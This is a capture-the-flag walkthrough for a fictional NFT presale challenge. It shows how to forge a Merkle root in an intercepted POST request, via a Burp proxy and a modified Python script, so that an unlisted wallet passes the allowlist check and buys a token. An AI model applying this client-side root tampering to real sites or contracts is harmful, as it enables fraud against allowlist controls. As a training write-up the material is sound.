Terminal: Exploit-a-Smart-Contract
Objective
Recover the Burning Ring of Fire
Task 3: Exploit a Smart Contract
Difficulty: 5/5 Christmas Trees Description: Exploit flaws in a smart contract to buy yourself a Bored Sporc NFT. Find hints for this objective hidden throughout the tunnels.
Hints
Professor Petabyte's talk can be viewed here: https://www.youtube.com/watch?v=Qt_RWBq63S8 Professor Petabyte has a GitHub repo here: https://github.com/QPetabyte/Merkle_Trees
Solution
Opening the terminal opens the BSRS home page at https://boredsporcrowboatsociety.com. Clicking on either of the pre-sale links brings you to a page with the following information.
# Welcome to the Bored Sporc Rowboat Society Presale Page!
The presale is only available to those select individuals who have earned a place on our exclusive presale list. If you're not on the list, you might as well leave, because you ain't gettin' a Sporc until we open up sales to the general public. If you are on the list, **_welcome!_**
Here's all you gotta do to pre-purchase your Sporc:
1. The presale price for a Sporc is 100 KringleCoin (KC). Yeah, we know that's crazy cheap, but we take care of our buds. When we open sales to the public, these things are gonna shoot to the moon.
2. First, you're gonna want to make sure that your wallet address is on the approved list. Just make sure to leave the "Validate only" box checked, fill in the form, and we'll let you know if you're good-to-go. Before you do anything else, it's always good to be sure you're doing everything right and your address is validated as being on the list (it's actually something called a Merkle Tree... very high-techy-techy stuff).
3. To check if you're on the list, enter your wallet address and the string of proof values that we gave you when we told you that you were on the pre-approved list. Those values should be hex strings (i.e. start with "0x" and consist of a bunch of values that are 0-9 or "a," "b," "c," "d," "e," or "f"). If you're confused, give us a shout and we can help.
4. If you're not on the presale list, **_you're not on the list_**. Don't beg and plead with us to put you on the list. Seriously - we've only put Sporcs that we're tight with on the list. _**WE**_ decided who's on the list (COOL SPORCS ONLY). We don't just let **_anyone_** on. If we were putting you on the list, we would've contacted you... not the other way around.
5. Once you've confirmed everything works and you're sure you have the whole _validated-and-on-the-list_ thing down, just go find a KTM and pre-approve a 100 KC transaction from the wallet you validated. That way, the funds are ready to go. Our Wallet Address is 0xe8fC6f6a76BE243122E3d01A1c544F87f1264d3a.
6. Once you've pre-approved the payment, come back here do the same thing you did when you validated your address, just uncheck the "Validate Only" thing. Then, we'll grab your K'Coin, mint a brand spankin' new Sporc, and fire it into your wallet. Zap! Just like that, you'll be the owner of an amazing piece of the digital domain and a member of the Bored Sporc Rowboat Society for life! (Or, until you decide to cash-out and sell your Bored Sporc).
Below that are form fields to submit a Wallet Address, Proof Values, and a "Validate Only" checkbox.
Download the merkle_tree.py Python script from Professor Petabyte's github repo, edit the first address in the allowlist array on line 149 to your wallet address, then execute the script.
python3 merkle_tree.py
Root: 0xdf03824b5247f7f67570c9f69b6caf5d0c88312088805c0f0423f9e6cccb2ae7
Proof: ['0x5380c7b7ae81a58eb98d9c78de4a1fd7fd9535fc953ed2be602daaa41767312a']
Send a validation request through the site and intercept it with Burp. The POST data includes a Root variable.
{"WalletID":"0xaA0efBB9c2975175d6A81c4814F85076D374531d","Root":"0x52cfdfdcba8efebabd9ecc2c60e6f482ab30bdc6acf8f9bd0600de83701e15f1","Proof":"0x5380c7b7ae81a58eb98d9c78de4a1fd7fd9535fc953ed2be602daaa41767312a","Validate":"true","Session":"04029278-b642-4b45-a3ca-b5c00ba17bd4"}
Update this Root value to match the value generated by the python script.
{"WalletID":"0xaA0efBB9c2975175d6A81c4814F85076D374531d","Root":"0xdf03824b5247f7f67570c9f69b6caf5d0c88312088805c0f0423f9e6cccb2ae7","Proof":"0x5380c7b7ae81a58eb98d9c78de4a1fd7fd9535fc953ed2be602daaa41767312a","Validate":"true","Session":"04029278-b642-4b45-a3ca-b5c00ba17bd4"}
The response should indicate you are on the list and good to go.
Exit the challenge and head up to ladder to the KTM. Interact with it and approve a 100 KC transfer to wallet address 0xe8fC6f6a76BE243122E3d01A1c544F87f1264d3a, using your Wallet Key to approve. Close the KTM and head back down the ladder. Open the BSRS terminal and click the Presale link again. Submit the same information, this time unchecking the "Validate Only" box. You will still have to Intercept the request and update the Root value.
{"WalletID":"0xaA0efBB9c2975175d6A81c4814F85076D374531d","Root":"0xdf03824b5247f7f67570c9f69b6caf5d0c88312088805c0f0423f9e6cccb2ae7","Proof":"0x5380c7b7ae81a58eb98d9c78de4a1fd7fd9535fc953ed2be602daaa41767312a","Validate":"false","Session":"69a5287e-6ee9-41b1-ae5d-4c10b5dee0e3"}
You should receive a success message indicating you purchased a BSRS Token.
Success! You are now the proud owner of BSRS Token #000070. You can find more information at https://boredsporcrowboatsociety.com/TOKENS/BSRS70, or check it out in the gallery!
Transaction: 0x54bbcff5ba6978e3a0c91d834e97d2c9831d12da1775dfc2f59712ca87fb185f, Block: 41023
Remember: Just like we planned, tell everyone you know to _BUY A BoredSporc_.
When general sales start, and the humans start buying them up, the prices will skyrocket, and we all sell at once!
The market will tank, but we'll all be rich!!!
Return to the Burning Ring of Fire Area to collect your rewards.